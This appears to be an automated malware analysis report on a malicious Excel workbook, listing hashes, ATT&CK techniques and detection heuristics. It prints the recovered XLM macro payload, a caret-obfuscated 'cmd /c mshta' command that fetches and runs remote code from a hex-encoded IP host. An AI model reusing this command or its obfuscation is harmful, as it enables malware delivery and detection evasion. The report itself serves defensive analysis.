Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 543f024d39da758f…

MALICIOUS

Office (OLE) / .XLS

Size: 64.8 KB
Created: 2022-01-17 17:40:35
Authoring application: Microsoft Excel
MD5: c3f0810ff66b330d1962f37c3df771a7
SHA-1: 913dc0addc2e48ab30d904636b6f3b13f9056019
SHA-256: 543f024d39da758f4284cc37375fa7b911db8f6092f5ed5cc3a176ec46655ac2
Risk Score: 100

Malware Insights

MITRE ATT&CK
  • T1204.002 User Execution: Malicious File
  • T1059.005 Command and Scripting Interpreter: Visual Basic for Applications
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.001 Command and Scripting Interpreter: PowerShell

The sample uses a 'version conversion' lure in the document body to trick the user into enabling macros. The embedded Excel 4.0 (XLM) macros use the Auto_Open trigger to execute a command line string. Specifically, the script executes 'cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/c.html' and 'cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html', where the caret symbols are cmd.exe escape characters: cmd strips them before running the command, so they only obfuscate the string against naive pattern matching.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
SHA-256: 0807f652a36752efcd354ce3c536f2fe7ed4cd53a3ff1787c33acb378dda90a0
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 1073 bytes